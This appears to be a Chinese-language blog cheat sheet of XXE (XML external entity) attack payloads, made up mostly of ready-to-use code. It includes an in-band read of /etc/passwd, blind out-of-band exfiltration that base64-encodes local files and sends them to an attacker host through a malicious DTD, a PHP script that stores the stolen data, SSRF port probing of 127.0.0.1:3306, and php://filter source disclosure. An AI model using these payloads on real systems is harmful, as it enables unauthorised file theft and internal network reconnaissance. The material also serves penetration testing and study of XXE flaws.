1. XXE 介绍
【知识科普】今天聊聊XML这种文件格式_xml文件-CSDN博客
2. XXE payload
2.1. 有回显—读取文件
1
2
3
4
5
6
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [
<!ENTITY content SYSTEM "file:///etc/passwd">
<!--<!ENTITY content SYSTEM "file:///c://Windows//System32//test.txt">-->
]>
<x>&content;</x>
可通过读取不存在文件,根据报错获取当前路径
可知当前路径:C:\Software\phpstudy_pro\WWW\xxe-lab\php_xxe\
2.2. 无回显-读取文件
2.2.1. 方法一
1
2
3
4
5
6
7
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=d:/test.txt">
<!ENTITY % dtd SYSTEM "http://192.168.30.130:8081/test.dtd">
%dtd;
%send;
]>
test.dtd
1
2
<!ENTITY % payload "<!ENTITY % send SYSTEM 'http://192.168.30.130:8081/?data=%file;'>">
%payload;
2.2.2. 方法二
hack服务器创建 1.php
1
<?php file_put_contents("1.txt", $_GET['file']); ?>
hack 服务器创建 evil.xml
1
<!ENTITY % payload "<!ENTITY % send SYSTEM 'http://192.168.163.130:8000/1.php?content=%file;'>"> %payload;
1.php、evil.xml 目录下开启 http 服务
1
python -m http.server -b 192.168.163.130 8000
bp抓包修改
1
2
3
4
5
6
7
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///C://windows//win.ini">
<!ENTITY % dtd SYSTEM "http://192.168.163.130:8000/evil.xml">
%dtd;
%send;
]>
2、SSRF—探测端口:
适用于有回显和blind xxe,也是外部一般实体:
1
2
3
4
5
6
7
<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY content SYSTEM "http://127.0.0.1:3306">]>
<name>&content;</name>
根据响应时间判断是否存活
3、如果是php的话,可以用php的filter协议直接读出文件
1
2
3
4
5
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY>
<!ENTITY goodies SYSTEM "php://filter/read=convert.base64-encode/resource=index.php"> ]>
<creds>&goodies;</creds>
